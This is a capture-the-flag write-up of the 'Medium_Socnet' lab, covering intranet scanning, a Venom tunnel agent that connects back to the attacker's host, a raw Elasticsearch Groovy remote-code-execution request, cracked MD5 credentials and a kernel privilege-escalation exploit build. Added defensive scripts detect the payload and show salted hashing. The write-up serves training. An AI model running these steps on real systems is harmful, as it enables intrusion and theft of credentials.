Yunchen Shooting Range: Medium_Socnet. The internal network is Docker; there is no web proxy script (site agent) available; gcc is not present on the target, so the privilege-escalation exploit cannot be built there; and the local glibc (ldd) version is too new for the compiled exp to run on the target, which is solved by specifying the .so file explicitly.

First, we can scan the current intranet through arp-scan.

But for some reason I don't understand, it cannot scan anything out. Then we can use fscan to find live hosts instead.

Here fscan generally only finds port 22 open.

So we use nmap for a fuller information-gathering scan:

nmap -sS -sV -A -p- 172.25.0.13

This performs a TCP SYN scan of all ports with service/version detection and OS detection.

Here we can see that the service on port 5000 is written in Python.

Or, if we only want to check ports, use PortScan instead.

Then let's open port 5000 and take a look.

Here we are prompted to enter code, which is then executed as Python, so let's see if we can get a reverse shell directly.

getshell (steps omitted)

Look at the challenge description here:

This is a medium-difficulty target machine. There are several Docker virtual machines inside it, so that it gives a preliminary introduction to the intranet part, such as intranet information collection, intranet penetration, simple lateral movement, etc.

Connect to the network, independently detect and discover the simulated virtual target machine, and exploit its vulnerabilities to obtain its root privileges. Submit the password of user john as the answer.

So it is quite likely that this is a Docker container.

Quickly determine whether it is a docker environment_How to determine whether a website is docker-CSDN Blog

Check whether it is Docker:

ps -ef

Very few processes indeed.

ls /.dockerenv

It exists, indeed.

cat /proc/1/cgroup

It is all docker, so there is no doubt this is a Docker environment.
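The three checks above (process count, /.dockerenv, /proc/1/cgroup) folded into one small Python script, added here as an example and not part of the original writeup. The cgroup hint words and the process-count threshold are assumptions for illustration; the verdict logic treats /.dockerenv or a cgroup hint as strong evidence and a tiny process table only as a weak hint, because a minimal VM can look just as empty.

```python
"""Added example (not from the original writeup): the three container checks
used above (process count, /.dockerenv, /proc/1/cgroup) folded into one
function, so the decision logic can be read and tested."""
import os

# Substrings that commonly appear in /proc/1/cgroup inside containers.
# (This list is an assumption based on common runtimes, not from the page.)
CGROUP_HINTS = ("docker", "lxc", "kubepods", "containerd")


def cgroup_hints(cgroup_text: str) -> list:
    """Return the hint words found in the text of /proc/1/cgroup."""
    found = []
    for line in cgroup_text.splitlines():
        for hint in CGROUP_HINTS:
            if hint in line and hint not in found:
                found.append(hint)
    return found


def container_verdict(dockerenv_exists: bool, cgroup_text: str, process_count: int) -> dict:
    """Combine the three indicators into a verdict.

    A very small process table alone is only a weak hint, so it never decides
    on its own; /.dockerenv or a cgroup hint is treated as strong evidence."""
    hints = cgroup_hints(cgroup_text)
    strong = dockerenv_exists or bool(hints)
    weak = process_count < 20  # threshold is an assumption for illustration
    return {
        "is_container": strong,
        "dockerenv": dockerenv_exists,
        "cgroup_hints": hints,
        "few_processes": weak,
    }


def inspect_local_host() -> dict:
    """Run the same checks against the machine this script executes on."""
    try:
        with open("/proc/1/cgroup", "r") as fh:
            cgroup_text = fh.read()
    except OSError:
        cgroup_text = ""
    try:
        process_count = len([p for p in os.listdir("/proc") if p.isdigit()])
    except OSError:
        process_count = 0
    return container_verdict(os.path.exists("/.dockerenv"), cgroup_text, process_count)


if __name__ == "__main__":
    print(inspect_local_host())
```

One caveat worth knowing: on hosts using cgroup v2, /proc/1/cgroup inside a container often reads just `0::/`, so the cgroup hint can miss; that is why the script never relies on a single indicator.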

Let's look at proxies here.

Intranet proxy

I used Neo-reGeorg-5.1.0 before, but that requires the site to host a tunnel script in a common web language; if the site cannot parse such a script, it will not work.

Learn it here:

Venom

Release Venom v1.1.0 · Dliv3/Venom · GitHub

First we start the server side. Here I am on Windows.

.\admin.exe -lport 9999

Then download the agent to the target machine with wget and start it:

chmod 777 agent_linux_x64
./agent_linux_x64 -rhost 10.8.0.6 -rport 9999

Then go back to the admin side:

show

goto 1

socks 1080

This way we open a SOCKS5 proxy on port 1080.

Then we connect through it.

Here we first need to know the intranet IP of this Docker container:

ifconfig

172.17.0.3

Let's visit 172.17.0.3:5000.

It is the same page.

So this is the intranet IP we are looking for.

How do we escape from Docker?

First we need to explore the intranet.

Intranet exploration with a shell script:

for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done

Here we cannot send ping (ICMP) through the SOCKS proxy because it works at a different layer, so we can either run ping from the reverse shell,

or proxy nmap out through it, but my nmap produced a lot of incorrect results. It might be a problem with the range, so I chose to run the shell script in the reverse shell.

Here we get these IPs:

172.17.0.1, 172.17.0.2, 172.17.0.3

Then we can scan the services with nmap:

nmap -sV -sT 172.17.0.2 -Pn

We find port 9200 open, running an Elasticsearch service.

OK

Go and search for an exploit.

Then copy it into a Python file.

After uploading it with wget and running it, we get an error that requests is not installed.

pip install -t /usr/lib/python2.7/dist-packages/ requests

The range has no internet access, so it cannot be installed online.

So we install it offline:

https://www.cnblogs.com/Javi/p/9151629.html

https://www.cnblogs.com/rainbow-tan/p/14794387.html

These two articles explain how to download the packages and install them offline.

Then run:

python 36337.py 172.17.0.2

getshell

I could not get it to work here, so I chose to reproduce it manually.

First create a document so that there is data in the index:

POST /website/blog/ HTTP/1.1
Host: 172.17.0.2:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
 
 
{
  "name": "test"
}

The second request executes the command:

POST /_search?pretty HTTP/1.1
Host: 172.17.0.2:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}
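From the defender's side, the request above is easy to spot: a `_search` body whose `script_fields` entry carries a Groovy script that reaches into `java.lang.Runtime`. The following detector is an added example, not part of the original writeup; the log line format (`CLIENT METHOD PATH BODY`), the sample lines and the token list are constructed assumptions for illustration. The only real fix for this class of issue is upgrading Elasticsearch and disabling dynamic scripting; the detector is there to find the attempts in the meantime.

```python
"""Added example, not from the original writeup: a small detector for the
Elasticsearch dynamic-scripting abuse shown above, run over constructed
access-log lines.  The log format and field names are assumptions."""
import json
import re

# Java classes/methods that a search-time script has no business touching.
# (Constructed list for illustration.)
SUSPICIOUS_TOKENS = (
    "java.lang.Runtime",
    "getRuntime()",
    ".exec(",
    "java.lang.ProcessBuilder",
    "forName(",
)

# Constructed sample log lines: CLIENT METHOD PATH BODY.  The third line is
# the payload from the writeup above (quotes escaped as in valid JSON).
SAMPLE_LOG = [
    '172.17.0.3 POST /website/_search {"query":{"match":{"name":"test"}}}',
    '172.17.0.3 POST /_search?pretty {"size":1,"script_fields":{"x":{"lang":"groovy","script":"1 + 1"}}}',
    '172.17.0.3 POST /_search?pretty {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": '
    '"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"ls\\").getText()"}}}',
]


def find_script_fields(body):
    """Return (lang, script) pairs for every script_fields entry in a request body."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []
    if not isinstance(doc, dict):
        return []
    out = []
    for spec in doc.get("script_fields", {}).values():
        if isinstance(spec, dict):
            out.append((spec.get("lang", "default"), str(spec.get("script", ""))))
    return out


def score_script(script):
    """Return the suspicious tokens present in a script; any hit deserves an alert."""
    return [tok for tok in SUSPICIOUS_TOKENS if tok in script]


def scan_log_lines(lines):
    """Parse 'CLIENT METHOD PATH BODY' lines and alert on scripted _search requests."""
    pattern = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")
    alerts = []
    for line in lines:
        m = pattern.match(line)
        if not m:
            continue
        client, method, path, body = m.groups()
        if "_search" not in path:
            continue
        for lang, script in find_script_fields(body):
            hits = score_script(script)
            if hits:
                alerts.append({"client": client, "path": path, "lang": lang, "tokens": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log_lines(SAMPLE_LOG):
        print(alert)
```

The benign arithmetic script in the second line is deliberately left alone: the signal is not "a script was used" but "a script names a JVM class that can spawn processes", which keeps false positives down on clusters that legitimately use script fields.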

I found that passwords exist. Let’s see what they are.

Sorted out:

john:3f8184a7343664553fcb5337a3138814 ----> 1337hack
test:861f194e9d6118f3d942a72be3e51749 ----> 1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b ----> 1111pass
root:b3d34352fc26117979deabdf1b9b6354 ----> 1234pass
jane:5c158b60ed97c723b673529b8a3cf72b ----> 1234jane

Look them up on an MD5 cracking website.

Try each of them over SSH in turn.
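The hashes fell to a lookup site because they are bare, unsalted MD5: two users with the same password get the same digest, so one precomputed table answers for everyone. The script below is an added example, not from the original writeup, contrasting that scheme with a salted, iterated PBKDF2 record; the password strings and the record format are constructed for illustration.

```python
"""Added example, not part of the original writeup: why unsalted MD5 records
are lookup-table fodder, contrasted with a salted PBKDF2 record.  Passwords
and the record format are constructed for illustration."""
import hashlib
import hmac
import os


def md5_store(password: str) -> str:
    """The weak scheme seen in the index: bare MD5, no salt, no work factor."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_store(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; the record carries everything verify needs."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), digest.hex())


def pbkdf2_verify(password: str, record: str) -> bool:
    """Recompute the digest from the stored salt and iteration count."""
    _, iters, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)  # constant-time compare


def precomputable(store) -> bool:
    """True if two records for the same password are identical, which is exactly
    the property that lets a public hash-lookup table recover the plaintext."""
    return store("1234pass") == store("1234pass")


if __name__ == "__main__":
    print("md5 precomputable:", precomputable(md5_store))        # True
    print("pbkdf2 precomputable:", precomputable(pbkdf2_store))  # False
    rec = pbkdf2_store("1337hack")
    print(rec)
    print("verify:", pbkdf2_verify("1337hack", rec))
```

The iteration count is the second half of the defence: even if an attacker obtains the salt, each guess costs 200,000 HMAC computations instead of one MD5, so a small wordlist like the one these passwords came from no longer finishes in seconds.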

Finally, I successfully logged in with john's account and password.

Elevation of privilege

Now we need to escalate privileges

First look at the kernel version:

uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Search for it:

searchsploit 3.13.0 linux

Extract it.

There is a problem here: the machines are different, so the .so files will not be the same.

Therefore we cannot guarantee that the same .so file exists on the target machine, and gcc is not available on the target either.

So we need to upload the exp and the .so together.

Modify the source code first

Delete this part here (or comment it out).

Then compile with gcc:

gcc -o exp 37292.c

Then we locate the .so file:

find / -name ofs-lib.so 2>/dev/null

or

locate ofs-lib.so

cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so /mnt/c/Users/Administrator/Desktop/

Then we upload both directly to /tmp.

Make it executable and run it.

An error is reported here. This means the dynamic link library (glibc) on my Kali is too new. Here we can use

ldd --version

on the target machine to determine its glibc version, then download and unpack the matching libc package and point gcc at it when compiling:

gcc -o exp 37292.c -Ldir /mnt/c/Users/Administrator/Desktop/ldd-2.19/libc6_2.19-0ubuntu6_amd64/data/lib/x86_64-linux-gnu/libc.so.6

Then just make it executable:

chmod +x exp

./exp

Success.

So the flag is 1337hack.

I think the most important thing here is solving the problem of being unable to execute commands on the target machine to get the exp running.